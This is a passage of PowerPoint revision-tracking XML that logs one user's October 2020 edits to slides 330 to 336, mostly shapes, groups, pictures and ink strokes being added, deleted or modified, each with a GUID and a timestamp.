          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:32:02.893" v="561" actId="21"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:spMk id="49" creationId="{23672474-C0ED-4246-B3C2-74C5B80BA44A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:54:14.775" v="212"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="12" creationId="{18C6B0DF-F1B0-48DC-AA79-71299BD04E4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21" creationId="{5ABEEE2B-922F-4044-B568-C0EBAA7E21D3}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:54:29.588" v="225"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="25" creationId="{A86BD2BE-582D-42E5-89F2-903F85F39BD7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:54:34.264" v="234"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="34" creationId="{DA2C6D29-DD4C-4633-A16F-EEDB0EF366F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43" creationId="{558BF7AE-6CAB-4E89-873B-31CDBD5B9209}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:37.492" v="669"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="51" creationId="{0240A549-7DD9-448A-8398-B7BB12905D1C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:04.309" v="654"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="54" creationId="{C328A4B8-DBF6-41AE-8847-2A683B7FF7F7}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:18.845" v="661"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="58" creationId="{4D8F7F48-9728-4149-9B3E-D8893D152320}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:28.127" v="665"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="60" creationId="{99F85605-3641-4309-8AB9-0CC19DF768F4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:39.912" v="671"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:grpSpMk id="64" creationId="{17F8A70E-91E1-411B-8FB4-6E69C1398012}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="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6" creationId="{A8C7B28E-35F9-4ED9-ADB5-1EF52EADB07C}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add 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7" creationId="{0ECE60EB-D74A-42CE-AC27-92B3561B781D}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:36:28.804" v="579" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:picMk id="2" creationId="{50A2AB7A-A40B-40CA-B8D8-1FBB6C79FFCC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12" creationId="{0BD96EC4-2218-479C-9CEB-AC5D42270D1E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50" creationId="{83F5AC02-5899-49C6-B839-4EB3220AE595}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:34:48.402" v="102" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:inkMk id="2" creationId="{C5FE897E-09C7-48BE-B8B5-87A83A51676C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3" creationId="{386612E4-87F2-432B-8D09-B09EE620842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4" creationId="{59C2AF84-5928-4E97-A423-402EBD0151B0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5" creationId="{56ED43FA-8316-4C89-B55B-EEC0AC7B39BD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6" creationId="{A1AF1DF7-583A-440C-965E-7FF7D72AC11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7" creationId="{DDB1F9D1-7CAD-484A-9FD4-E1019D189C34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8" creationId="{9BB92991-948E-49FA-A27C-9A45201C22C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9" creationId="{E20D37DC-B217-4989-A80A-37FEC5B2A53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0" creationId="{D0DEAA40-4E81-48A9-A30A-2DBEF86D03B8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1" creationId="{680E2263-E2D2-44B7-B98B-63B06182C37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3" creationId="{29846379-9A3D-45E7-A3AD-BCA82064652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4" creationId="{2FC87625-319F-48B0-AF23-2D44616C7635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5" creationId="{A4C02977-B879-47CC-88DF-C194826FC55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6" creationId="{D1AFD9A2-D21E-45BA-93D4-809482CA187A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7" creationId="{F7391D1D-251E-4457-A1E5-758760CA88D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8" creationId="{890916D8-4955-4CFD-BC77-6575995FB60E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9" creationId="{1CC4C409-347B-4310-B10B-25FC2037099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20" creationId="{2A16BB19-CF54-4F96-926F-E9A945896BE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2" creationId="{2CE5806D-5056-46FF-B587-C4B834562EF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3" creationId="{28B08C33-91B8-4E42-8A3D-1836B3B727D9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4" creationId="{547CB074-0AC4-44A2-B9A0-461D024F796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25" creationId="{62216A1A-BFA9-4680-B1A0-949369AB3703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6" creationId="{9DD8791F-2337-4D54-8E61-4BE2A1B7B72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7" creationId="{43420AF4-9677-497B-AE5D-D95E7AE4C964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8" creationId="{590E4453-8423-4ADD-89DE-E552E5115A0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9" creationId="{0974D3E2-97A4-41AD-8C42-277FE735F2B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0" creationId="{F50505CB-0210-4E04-A582-77AB2125752D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1" creationId="{F188D96A-B1FC-47D8-9E91-22C1FE34B731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2" creationId="{3B6D72E8-A6CE-4D65-8AF1-A19EA0D6618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3" creationId="{F5BE794A-D59F-467C-A319-AC14E2B50FA5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34" creationId="{2656DA82-886C-432F-945D-CDED180EEB3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5" creationId="{88D138C5-159C-4DEE-86A3-5BB8CB8EA34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6" creationId="{04E8CD12-7FA0-41ED-8527-32FB4CD40F3E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7" creationId="{738F652D-F3BC-45D3-9F47-FA5E850FAA2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8" creationId="{04420642-535E-46C0-8D4A-D68A8C7603F5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9" creationId="{A53BD2B9-F10A-44A6-AF4B-D60136B4686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0" creationId="{13A4E2AA-0751-4D81-B0FB-4B5F968AD762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1" creationId="{C475296B-85E1-45EC-BB96-91A218950A9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2" creationId="{0B913E53-C6AE-4680-94C4-FE7A61587C7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44" creationId="{A285F21F-E30B-4EC1-BFCB-44A5CAA2A681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52" creationId="{FAC97A78-C552-4289-AE17-B0EC8470AAC6}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:04.309" v="654"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:inkMk id="53" creationId="{459C1CE4-2A08-4151-872E-8A84D726EE38}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:09.842" v="656" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:inkMk id="55" creationId="{801CEA69-1534-4E69-A4C2-DFA2A8251B04}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:41:09.153" v="675" actId="164"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:inkMk id="56" creationId="{232A61D8-6ED0-4FF6-8E3C-A45317B1A75C}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:18.845" v="661"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:inkMk id="57" creationId="{5415586A-7910-4DF5-AB79-D5FC1A666437}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:40:28.127" v="665"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3120802679" sldId="330"/>
            <ac:inkMk id="59" creationId="{40C0377F-F949-49F7-AE0F-9B90E645348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1" creationId="{27A3A432-A60D-4894-A8D7-C8C2C8BEABDA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2" creationId="{3C5241FD-4B91-4A5B-832F-7B7B89ADFE0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3" creationId="{08779022-0599-4C72-88DF-2EFE8F4F14F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5" creationId="{6979D751-5158-4E27-BE65-8134FFFAA41D}"/>
          </ac:inkMkLst>
        </pc:ink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101057785" sldId="331"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:23:11.969" v="90" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3319048051" sldId="331"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:21:34.023" v="53" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:spMk id="53" creationId="{4588914E-E9FC-4FE0-94D4-8A9F5E1137E0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:22:44.116" v="57" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:spMk id="54" creationId="{2B81CDBF-822A-4778-8C48-40B24FAB2BBF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:23:11.969" v="90" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:spMk id="55" creationId="{BEF5FB79-B802-4AE5-BAA4-6555CCE379AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:20:00.136" v="17" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:spMk id="70" creationId="{384D61BC-5624-4F68-9622-C90D085EBC17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:20:03.300" v="19" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:spMk id="71" creationId="{230E122C-7479-4007-B006-1E557B8496AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:20:04.317" v="20" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:spMk id="72" creationId="{F6231725-2B37-4C29-9EDD-8D6D44BFA2B2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:21:48.748" v="54" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:grpSpMk id="11" creationId="{A3FEDACB-A7B6-42EA-92B2-3CD61ED29024}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:20:06.564" v="21" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:grpSpMk id="25" creationId="{2B05EB8D-3A6E-430A-930F-F7DFE1907009}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:20:07.699" v="22" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:grpSpMk id="35" creationId="{92F66556-4B71-45E4-9F32-06C00646F940}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:20:01.505" v="18" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3319048051" sldId="331"/>
            <ac:grpSpMk id="50" creationId="{266EA2CA-7F64-4B0C-BF6F-621B7DEADAB0}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod addAnim delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:34:44.208" v="100" actId="478"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1766084224" sldId="332"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:24:42.028" v="94" actId="113"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1766084224" sldId="332"/>
            <ac:spMk id="53" creationId="{4588914E-E9FC-4FE0-94D4-8A9F5E1137E0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T20:34:44.208" v="100" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1766084224" sldId="332"/>
            <ac:spMk id="55" creationId="{BEF5FB79-B802-4AE5-BAA4-6555CCE379AB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8151649" sldId="332"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T20:55:11.867" v="2742" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1683626124" sldId="333"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-19T21:02:30.348" v="368" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683626124" sldId="333"/>
            <ac:spMk id="2" creationId="{1F3772A8-5404-458B-B257-27BB726A1236}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T20:55:11.867" v="2742" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1683626124" sldId="333"/>
            <ac:spMk id="3" creationId="{E0910A52-C5D6-4716-A928-1D6CA68B4147}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod delAnim modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:45:51" v="751" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2014413914" sldId="334"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:44:37.591" v="715" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:spMk id="20" creationId="{F15659BC-A632-4F19-85B0-ACD78990CE38}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:45:02.659" v="718" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:spMk id="59" creationId="{00E6EB91-CEEC-42B0-99E0-8256A7512B81}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:45:51" v="751" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:spMk id="60" creationId="{8379C367-A3DA-4013-B931-8FFC362EF25E}"/>
          </ac:spMkLst>
        </pc:s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6" creationId="{645F8F8D-8DFF-4050-AF52-E9CBED4A550A}"/>
          </ac:grpSpMkLst>
        </pc:gr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F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:44:34.643" v="714" actId="1076"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:grpSpMk id="26" creationId="{0792FBD7-0BB7-48DE-B7BD-41A70B009012}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="add del mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:44:25.016" v="711" actId="478"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:grpSpMk id="39" creationId="{4E42CC82-55E8-4A05-A965-B8C36C3018B5}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:44:08.850" v="708"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2014413914" sldId="334"/>
            <ac:picMk id="2" creationId="{93DF79E5-61EA-491A-8B74-8DDBA33A6421}"/>
          </ac:picMkLst>
        </pc:pic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3" creationId="{47B28F51-5841-4255-AAF4-0A6DE6746846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4" creationId="{ED4F84B1-699E-45D3-93BC-AB8D8B7403B7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5" creationId="{2FA01590-63B2-4909-8100-AA87A3A4A7BA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7" creationId="{96B41F55-2AB6-40C9-A539-550326BEF34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8" creationId="{251C3927-0E6E-46AC-AB35-111F8DD3CD70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0" creationId="{FA952CEF-00F6-468C-B852-DE6707D4E6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1" creationId="{3BD0FD12-2819-409C-898E-65F5F203C08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2" creationId="{CFE749F7-8573-4794-A3DF-609EE9A85ACB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3" creationId="{529C3730-C59F-4415-B04D-E17BD41C33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4" creationId="{52916C0F-AFE1-4CB2-B69B-C1FD18AFE6D1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5" creationId="{A76D3E29-1DAB-45B5-8C55-D81E734073AC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6" creationId="{140FDFFE-B986-447E-B6C0-A7D43BE8682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7" creationId="{929ED0E6-BE1C-45F1-A54A-E347D65BD09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8" creationId="{4A3952CF-5B62-479C-89ED-C57A5DB7E5A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9" creationId="{A792414A-7553-4CF6-BB04-AF6AEE76CFD3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1" creationId="{BB9BC961-581A-4B0C-AE86-CCBF5BA2C341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2" creationId="{CD4324D5-8ABA-401D-A1C9-E71F48226FAE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3" creationId="{E2B7F597-E533-4103-BD86-8CBA5CFA59C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4" creationId="{670C3951-C446-463E-8E30-BDD49A9C9C4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5" creationId="{BD62B7B2-EC29-4C82-BF56-82174F99EF4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7" creationId="{F96FE81F-8CCA-4B3E-91E2-8B8F0873063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8" creationId="{7360C25D-0869-4196-81AD-72D5BACB015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9" creationId="{C79B77F0-621C-419A-9C45-A2644A1ACE5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0" creationId="{6805B62E-0AD5-42A9-8731-BB5EE2AD724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1" creationId="{0D35E7C1-22DE-446F-8A99-27C8E1E0853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2" creationId="{0AE722D5-CD93-4A69-8C83-08C63B93371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3" creationId="{5FAAB022-9BDD-47B8-A645-04ED065075A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4" creationId="{A12DD077-6635-4161-AAA0-5048CE12C67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5" creationId="{95F08C41-7024-4E85-9B13-0061C484F15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6" creationId="{29F7CFA8-B72B-422E-B7A1-0C55341F031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7" creationId="{9ECA7EB2-F61F-4B99-A9D2-D59D0F474F9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8" creationId="{0BD267E1-C740-48D7-826D-8814FB0458B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0" creationId="{711388D7-264F-48D4-8563-D8BCC70F1B6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1" creationId="{CBBC110B-1A7E-4E5F-AC9F-58562CBA416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2" creationId="{FD90D623-D73F-4C4A-928C-F8581CD74C9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3" creationId="{62EBAF3F-CDBF-449F-A5C4-F8D85C975BC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4" creationId="{6FB50FB6-A81F-4366-A689-A2CBD1AB856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5" creationId="{1D05C34C-0285-4567-BE76-5E6C10F5E12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6" creationId="{5069674B-4B42-4A24-AAEF-9138B60F1EC4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7" creationId="{273E790A-E65C-4073-9AEB-E8367CE6910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8" creationId="{069DA2A9-C9C5-4ADF-8071-413843A93A1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9" creationId="{ABA7CA7E-B895-45F2-B462-98B11BD36BF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0" creationId="{2A4582E8-47AA-49BF-B699-581313BA3F8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1" creationId="{5CF76EEE-EC51-485F-A8E6-20BBC8E1BB2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2" creationId="{D408635B-5FCA-4D3B-8A83-8FA808CB237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3" creationId="{5FFB5E75-576D-4AB3-80E4-E4FEE6E197DC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4" creationId="{EF429D60-5D8C-48F5-BAF7-DC5043B8D40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5" creationId="{486CB087-3D87-458A-A333-5BA04EF9B3A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6" creationId="{865D4343-B3BC-4427-9302-DBE22EC9CAA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7" creationId="{3D1DC631-543F-493A-815E-3F513CD9A7F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8" creationId="{EEDA769E-87E6-458B-A0F1-E9C98E8F5608}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:47:03.233" v="759" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4237222095" sldId="335"/>
        </pc:sldMkLst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45:26.703" v="721"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4237222095" sldId="335"/>
            <ac:spMk id="48" creationId="{EDA18D79-2AC1-42EB-B8A0-230ECA9C4009}"/>
          </ac:spMkLst>
        </pc:spChg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9" creationId="{23672474-C0ED-4246-B3C2-74C5B80BA44A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:42:15.376" v="683" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4237222095" sldId="335"/>
            <ac:picMk id="50" creationId="{83F5AC02-5899-49C6-B839-4EB3220AE595}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modAnim">
        <pc:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:47:00.436" v="758"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="575477346" sldId="336"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Daniel Schwarz" userId="5bb35bb8-905a-4742-88d9-33d9089732e7" providerId="ADAL" clId="{F9B78808-CDE0-40B0-9A53-D532871CED2E}" dt="2020-10-20T19:46:28.545" v="757" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="575477346" sldId="336"/>
            <ac:spMk id="40" creationId="{46DDDBB1-E41A-45CE-A54F-10C393072532}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
